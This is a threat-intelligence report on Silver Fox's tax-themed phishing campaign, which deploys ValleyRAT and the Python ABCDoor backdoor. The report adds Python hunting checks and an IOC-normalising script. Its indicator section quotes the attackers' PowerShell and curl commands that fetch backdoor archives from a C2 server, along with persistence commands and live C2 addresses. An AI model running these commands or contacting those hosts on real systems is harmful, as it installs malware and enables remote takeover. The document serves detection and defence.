Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India

The Silver Fox threat group is conducting a phishing campaign targeting organizations in Russia and India with tax-themed lures. The attack chain utilizes a modified RustSL loader featuring geofencing and Phantom Persistence to deploy ValleyRAT. ValleyRAT subsequently downloads a novel Python-based backdoor called ABCDoor, which masquerades as a Tailscale VPN client and provides remote control and screen broadcasting capabilities.

Sensitivity: Immediate | Confidence: high | Analyzed: 2026-05-05 | Google

Authors: Anton Kargin

Actors / tools: Silver Fox, ValleyRAT, Winos 4.0, RustSL, ABCDoor

Source: Kaspersky

IOCs · 35

Detection / Hunter: Google

What Happened

A cybercriminal group known as Silver Fox is sending fake tax notices to organizations in Russia and India. When victims open the attached files or links, a hidden program is installed that eventually loads a new, custom-built tool called ABCDoor. This tool lets the attackers control the infected computer remotely and stream the user's screen back to them. Organizations should treat unsolicited tax-related emails with suspicion and keep their security software up to date.

Key Takeaways

  • The Silver Fox threat group is targeting Russian and Indian organizations using tax-themed phishing emails.
  • Attackers utilize a modified RustSL loader featuring 'Phantom Persistence' and geofencing checks to evade analysis.
  • The attack chain deploys the ValleyRAT backdoor, which subsequently downloads a novel Python-based backdoor named ABCDoor.
  • ABCDoor masquerades as the legitimate Tailscale VPN client and uses ffmpeg for multi-monitor screen broadcasting.
  • The threat actors use a segmented infrastructure, separating payload delivery servers from command-and-control (C2) servers.

Affected Systems

  • Windows OS

Attack Chain

The attack begins with tax-themed phishing emails containing malicious PDFs or archives. Victims execute a modified RustSL loader that decrypts a shellcode payload, which in turn downloads and executes the ValleyRAT backdoor. ValleyRAT then retrieves a custom module to download the ABCDoor Python backdoor archive, extracting it to a directory masquerading as Tailscale VPN. Finally, ABCDoor establishes persistence via registry keys or scheduled tasks and connects to its C2 for remote control and screen broadcasting.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: Yes
  • Platforms: Kaspersky Endpoint Detection and Response Expert

Kaspersky provides specific detection rules (nodejs_dist_url_amsi, access_to_ip_detection_services_from_nonbrowsers, persistence_via_environment) within its EDR Expert platform.

Detection Engineering Assessment

  • EDR Visibility: High — The attack involves multiple process creations (cmd, powershell, curl, pythonw), registry modifications for persistence, and file drops in AppData and ProgramData, all of which are highly visible to EDR.
  • Network Visibility: Medium — C2 communication is HTTPS, but initial payload downloads (ZIP files) and geofencing checks to public IP APIs are visible in network telemetry.
  • Detection Difficulty: Moderate — While the tools use custom encryption and Phantom Persistence, the reliance on standard LOLBins (curl, powershell) and noisy registry persistence makes behavioral detection feasible.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon 1)
  • Registry Value Set (Sysmon 13)
  • File Creation (Sysmon 11)
  • Network Connection (Sysmon 3)

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
Look for pythonw.exe executing with the '-m appclient' argument, indicating ABCDoor execution. | Process Creation | Execution | Low
Monitor for curl.exe or powershell.exe downloading ZIP archives to the AppData directory. | Process Creation, Command Line | Command and Control | Medium
Detect non-browser processes (such as unknown executables or pythonw.exe) making outbound connections to IP geolocation services (e.g., ipinfo.io, ip-api.com). | Network Connections, DNS Queries | Discovery | Medium
Identify modifications to the HKCU\Environment\UserInitMprLogonScript registry value, a known persistence mechanism used by the JS loader. | Registry Modifications | Persistence | Low

Control Gaps

  • Email security gateways failing to inspect links within attached PDFs

Key Behavioral Indicators

  • pythonw.exe running from C:\ProgramData\Tailscale\python\
  • Creation of %LOCALAPPDATA%\applogs\device.log
  • schtasks creating a task named 'AppClient'
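The hunting hypotheses in the table above and the behavioral indicators listed here can be turned into a small set of checks over endpoint telemetry. The block below is an added example written for this page, not Kaspersky's EDR rules and not code from the report. It uses Sysmon-style field names (EventID, Image, CommandLine, TargetObject, DestinationHostname) over constructed events; the browser allowlist and the "Low" FP risk assigned to the two indicator-derived checks are assumptions, and the fake Tailscale path is the one given under Key Behavioral Indicators.

```python
"""Hunting checks for the Silver Fox / ABCDoor behaviours on this page, run over
constructed Sysmon-style events. Added example; not Kaspersky's detection
logic. Field names follow Sysmon; the events themselves are made up."""
import re

# From the hunting table. Extend with the geolocation services your environment
# actually sees; the browser allowlist below is an assumption.
GEO_IP_SERVICES = {"ipinfo.io", "ip-api.com"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
TAILSCALE_MASQ_DIR = "c:\\programdata\\tailscale\\python\\"   # from Key Behavioral Indicators


def _basename(image: str) -> str:
    """Lower-case file name of an Image path, tolerating either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def pythonw_appclient(ev: dict) -> bool:
    """pythonw.exe launched with '-m appclient' (ABCDoor entry point)."""
    return (ev.get("EventID") == 1
            and _basename(ev.get("Image", "")) == "pythonw.exe"
            and re.search(r"(?i)\s-m\s+appclient\b", ev.get("CommandLine", "")) is not None)


def tailscale_masquerade(ev: dict) -> bool:
    """pythonw.exe running from the fake Tailscale directory under ProgramData."""
    return (ev.get("EventID") == 1
            and ev.get("Image", "").lower().startswith(TAILSCALE_MASQ_DIR)
            and _basename(ev.get("Image", "")) == "pythonw.exe")


def appclient_task(ev: dict) -> bool:
    """schtasks.exe creating a task named AppClient."""
    return (ev.get("EventID") == 1
            and _basename(ev.get("Image", "")) == "schtasks.exe"
            and re.search(r'(?i)/create\b.*\s/tn\s+"?appclient"?', ev.get("CommandLine", "")) is not None)


def zip_download_to_appdata(ev: dict) -> bool:
    """curl.exe or powershell.exe fetching a .zip into AppData (expanded path or %LOCALAPPDATA%)."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) not in {"curl.exe", "powershell.exe"}:
        return False
    cl = ev.get("CommandLine", "")
    return (re.search(r"(?i)\.zip\b", cl) is not None
            and re.search(r"(?i)(\\appdata\\|%(local)?appdata%)", cl) is not None)


def nonbrowser_geoip(ev: dict) -> bool:
    """Non-browser process contacting an IP geolocation service (the loader's geofencing check)."""
    return (ev.get("EventID") == 3
            and ev.get("DestinationHostname", "").lower() in GEO_IP_SERVICES
            and _basename(ev.get("Image", "")) not in BROWSERS)


def logon_script_persistence(ev: dict) -> bool:
    """Registry value set on Environment\\UserInitMprLogonScript or under Software\\CarEmu.
    Sysmon logs HKU\\<SID>\\... rather than HKCU, so match on the tail of the path."""
    if ev.get("EventID") != 13:
        return False
    target = ev.get("TargetObject", "").upper()
    return (target.endswith("\\ENVIRONMENT\\USERINITMPRLOGONSCRIPT")
            or "\\SOFTWARE\\CAREMU\\" in target)


# (name, predicate, FP risk): table values where given; "Low" assumed for the indicator-derived checks.
CHECKS = [
    ("pythonw_appclient", pythonw_appclient, "Low"),
    ("tailscale_masquerade", tailscale_masquerade, "Low"),
    ("appclient_task", appclient_task, "Low"),
    ("zip_download_to_appdata", zip_download_to_appdata, "Medium"),
    ("nonbrowser_geoip", nonbrowser_geoip, "Medium"),
    ("logon_script_persistence", logon_script_persistence, "Low"),
]


def hunt(events):
    """Return (event_index, check_name, fp_risk) for every check each event trips."""
    hits = []
    for i, ev in enumerate(events):
        for name, pred, risk in CHECKS:
            if pred(ev):
                hits.append((i, name, risk))
    return hits


# Constructed sample telemetry (not real events): one per hypothesis plus two benign controls.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\ProgramData\\Tailscale\\python\\pythonw.exe",
     "CommandLine": "pythonw.exe -m appclient"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": 'curl.exe -L -o "C:\\Users\\u\\AppData\\Local\\appclient\\111.zip" http://example.invalid/x.zip'},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": 'schtasks /create /sc minute /mo 1 /tn "AppClient" /tr "C:\\placeholder.exe"'},
    {"EventID": 3, "Image": "C:\\ProgramData\\Tailscale\\python\\pythonw.exe",
     "DestinationHostname": "ipinfo.io"},
    {"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationHostname": "ipinfo.io"},                       # benign control: a browser
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Environment\\UserInitMprLogonScript"},
    {"EventID": 1, "Image": "C:\\Python312\\pythonw.exe",
     "CommandLine": "pythonw.exe -m http.server"},             # benign control: ordinary Python use
]

if __name__ == "__main__":
    for idx, name, risk in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {name} (FP risk {risk})")
```

The two benign controls show where the FP risk comes from: the geolocation check only fires for non-browser images, and the pythonw check keys on the module name and the masquerade path rather than on pythonw.exe alone. When porting these to a real query language, keep the tail-match on UserInitMprLogonScript, since the hive prefix in Sysmon data is the user's SID rather than HKCU.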

False Positive Assessment

  • Low. The specific combination of pythonw.exe executing the 'appclient' module, masquerading as Tailscale in ProgramData, and the specific registry keys (CarEmu) are highly unique to this threat.

Recommendations

Immediate Mitigation

  • Block known C2 IP addresses and domains associated with ABCDoor and ValleyRAT.
  • Search endpoint telemetry for the presence of 'appclient' in command lines or scheduled tasks.

Infrastructure Hardening

  • Restrict the execution of pythonw.exe from non-standard directories such as ProgramData or AppData (for example with AppLocker or WDAC path rules).
  • Implement strict email filtering rules to quarantine PDFs containing suspicious external links.

User Protection

  • Deploy EDR solutions configured to monitor for suspicious child processes spawned by PDF readers or Office applications.
  • Disable or restrict the use of curl.exe and powershell.exe for standard users.

Security Awareness

  • Train employees to recognize tax-themed phishing lures and verify the sender's address.
  • Instruct users not to click on links within unsolicited PDF documents.

MITRE ATT&CK Mapping

  • T1566.001 - Phishing: Spearphishing Attachment
  • T1566.002 - Phishing: Spearphishing Link
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.003 - Command and Scripting Interpreter: Windows Command Shell
  • T1059.006 - Command and Scripting Interpreter: Python
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1053.005 - Scheduled Task/Job: Scheduled Task
  • T1036.005 - Masquerading: Match Legitimate Name or Location
  • T1113 - Screen Capture
  • T1614.001 - System Location Discovery: System Language Discovery
  • T1105 - Ingress Tool Transfer

Additional IOCs

  • IPs:
    • 108[.]187[.]37[.]85 - ValleyRAT C2 IP address
    • 108[.]187[.]42[.]63 - ValleyRAT C2 IP address
    • 108[.]187[.]41[.]221 - Malicious IP address associated with Silver Fox infrastructure
    • 154[.]82[.]81[.]192 - Malicious IP address associated with Silver Fox infrastructure
    • 139[.]180[.]128[.]251 - Malicious IP address associated with Silver Fox infrastructure
    • 192[.]229[.]115[.]229 - Malicious IP address associated with Silver Fox infrastructure
    • 207[.]56[.]119[.]216 - Malicious IP address associated with Silver Fox infrastructure
    • 192[.]163[.]167[.]14 - Malicious IP address associated with Silver Fox infrastructure
    • 45[.]192[.]219[.]60 - Malicious IP address associated with Silver Fox infrastructure
    • 192[.]238[.]205[.]47 - Malicious IP address associated with Silver Fox infrastructure
    • 45[.]32[.]108[.]178 - Malicious IP address associated with Silver Fox infrastructure
    • 57[.]133[.]212[.]106 - Malicious IP address associated with Silver Fox infrastructure
  • Domains:
    • abc[.]3mkorealtd[.]com - ABCDoor C2 domain
    • abc[.]sudsmama[.]com - ABCDoor C2 domain
    • abc[.]woopami[.]com - ABCDoor C2 domain
    • abc[.]ilptour[.]com - ABCDoor C2 domain
    • abc[.]petitechanson[.]com - ABCDoor C2 domain
    • abc[.]doublemobile[.]com - ABCDoor C2 domain
    • mcagov[.]cc - ABCDoor loader C2 domain
    • roldco[.]com - ABCDoor loader C2 domain
    • vnc[.]kcii2[.]com - C2 domain for malicious remote control utilities
  • URLs:
    • hxxps://abc[.]haijing88[.]com/uploads/фнс/фнс[.]zip - URL hosting the malicious archive linked in the Russian phishing PDF
    • hxxps://abc[.]haijing88[.]com/uploads/印度邮箱/CBDT[.]rar - URL hosting the malicious archive linked in the Indian phishing PDF
    • hxxp://154[.]82[.]81[.]205/YD20251001143052[.]zip - URL hosting the ABCDoor Python backdoor archive
    • hxxp://154[.]82[.]81[.]205/YN20250923193706[.]zip - URL hosting the ABCDoor Python backdoor archive
  • File Hashes:
    • 13669B8F2BD0AF53A3FE9AC0490499E5 (MD5) - ABCDoor .pyd core module
    • 5B998A5BC5AD1C550564294034D4A62C (MD5) - ABCDoor .pyd core module (early version)
    • 2B92E125184469A0C3740ABCAA10350C (MD5) - SFX archive containing ABCDoor JavaScript loader (BillReceipt.exe)
    • 039E93B98EF5E329F8666A424237AE73 (MD5) - Silver Fox RustSL loader
    • 4A5195A38A458CDD2C1B5AB13AF3B393 (MD5) - ValleyRAT plugin used to install ABCDoor
  • Registry Keys:
    • HKCU\Software\CarEmu, value FirstInstallTime - used by ABCDoor to store the initial installation timestamp
    • HKCU\Software\CarEmu, value InstallChannel - used by the ABCDoor JS loader to store the installation channel
    • HKCU\Environment, value UserInitMprLogonScript - set by the Silver Fox payload for persistence
    • HKCU\Console, value IpDate - hardcoded location checked when the ValleyRAT Login module starts
  • File Paths:
    • C:\ProgramData\Tailscale - Directory used by ABCDoor to masquerade as legitimate VPN software
    • %LOCALAPPDATA%\appclient\111.zip - Path where the downloaded ABCDoor archive is saved
    • %LOCALAPPDATA%\applogs\device.log - File created by ABCDoor to store the victim's ID
    • %LOCALAPPDATA%\applogs\exception_logs.zip - Archive created by ABCDoor to log exceptions
  • Command Lines:
    • Purpose: Download ABCDoor archive via PowerShell | Tools: powershell.exe | Stage: Execution | Invoke-WebRequest -Uri 'hxxp://154.82.81[.]205/YD20251001143052.zip' -OutFile
    • Purpose: Download ABCDoor archive via curl | Tools: curl.exe | Stage: Execution | curl.exe -L -o "%LOCALAPPDATA%\appclient\111.zip"
    • Purpose: Establish ABCDoor persistence via Registry | Tools: cmd.exe, reg.exe | Stage: Persistence | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "AppClient"
    • Purpose: Establish ABCDoor persistence via Scheduled Task | Tools: cmd.exe, schtasks.exe | Stage: Persistence | schtasks /create /sc minute /mo 1 /tn "AppClient" /tr
    • Purpose: Launch ABCDoor Python backdoor | Tools: pythonw.exe | Stage: Execution | pythonw.exe -m appclient
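The indicator list above is defanged inconsistently (both "[.]" and "[[.]]" appear, and URLs use hxxp), which is a common source of silently broken blocklists when such lists are pasted into tooling. The block below is an added example, not part of the Kaspersky report or this page's own tooling: it refangs each entry, validates it with the standard library, and groups it into a blocklist. The sample lines are copied from the list above in their defanged form; the header line and the final invalid address are constructed to exercise the rejection path.

```python
"""Normalise defanged indicators into a validated blocklist. Added example,
not from the Kaspersky report. Handles '[.]', '[[.]]', '(.)', '{.}' and
hxxp://, validates each value, and keeps the list's original order."""
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

_DEFANG_DOT = re.compile(r"\[\[\.\]\]|\[\.\]|\(\.\)|\{\.\}")
_DOMAIN = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$")
_MD5 = re.compile(r"^[0-9a-f]{32}$")


def refang(token: str) -> str:
    """Undo the common defanging conventions so the value can be parsed."""
    token = _DEFANG_DOT.sub(".", token)
    return re.sub(r"(?i)^hxxp", "http", token)


def _indicator_token(line: str) -> Optional[str]:
    """First whitespace-delimited token before the ' - description' part, or None."""
    head = line.strip().split(" - ", 1)[0].split()
    return head[0] if head else None


def classify(value: str) -> Optional[str]:
    """Return 'ip', 'domain', 'url' or 'md5', or None if the value does not validate."""
    if value.lower().startswith(("http://", "https://")):
        return "url"
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        pass
    if _MD5.match(value.lower()):
        return "md5"
    if _DOMAIN.match(value.lower()):
        return "domain"
    return None


def build_blocklist(lines):
    """Group validated indicators. A URL's host is also added to ips/domains so the
    payload-hosting server can be blocked, not only the exact path."""
    out = {"ips": [], "domains": [], "urls": [], "hashes": [], "unparsed": []}

    def add(bucket: str, value: str) -> None:
        if value not in out[bucket]:
            out[bucket].append(value)

    for line in lines:
        token = _indicator_token(line)
        if token is None:
            continue
        value = refang(token)
        kind = classify(value)
        if kind == "ip":
            add("ips", value)
        elif kind == "domain":
            add("domains", value.lower())
        elif kind == "md5":
            add("hashes", value.lower())
        elif kind == "url":
            add("urls", value)
            host = urlsplit(value).hostname or ""
            host_kind = classify(host)
            if host_kind in ("ip", "domain"):
                add("ips" if host_kind == "ip" else "domains", host)
        else:
            add("unparsed", value)   # never silently drop: a reviewer should see these
    return out


# Lines copied from the IOC list above (defanged as on the page), plus a constructed
# section header and a constructed invalid address to show the rejection path.
SAMPLE_LINES = [
    "Ips:",
    "108[.]187[.]37[[.]]85 - ValleyRAT C2 IP address",
    "abc[.]3mkorealtd[[.]]com - ABCDoor C2 domain",
    "mcagov[[.]]cc - ABCDoor loader C2 domain",
    "hxxps://abc[.]haijing88[[.]]com/uploads/фнс/фнс[.]zip - URL hosting malicious archive linked in Russian phishing PDF",
    "hxxp://154[.]82[.]81[[.]]205/YD20251001143052[.]zip - URL hosting the ABCDoor Python backdoor archive",
    "13669B8F2BD0AF53A3FE9AC0490499E5 (MD5) - ABCDoor .pyd core module",
    "999[.]1[.]1[.]1 - constructed invalid address",
]

if __name__ == "__main__":
    for bucket, values in build_blocklist(SAMPLE_LINES).items():
        print(f"{bucket}: {values}")
```

Note that 154.82.81.205 ends up in the IP bucket even though it only appears inside URLs on this page; that is deliberate, since the same host served two different archive names. Anything that fails validation lands in "unparsed" rather than being dropped, so a mangled entry is visible when the list is reviewed.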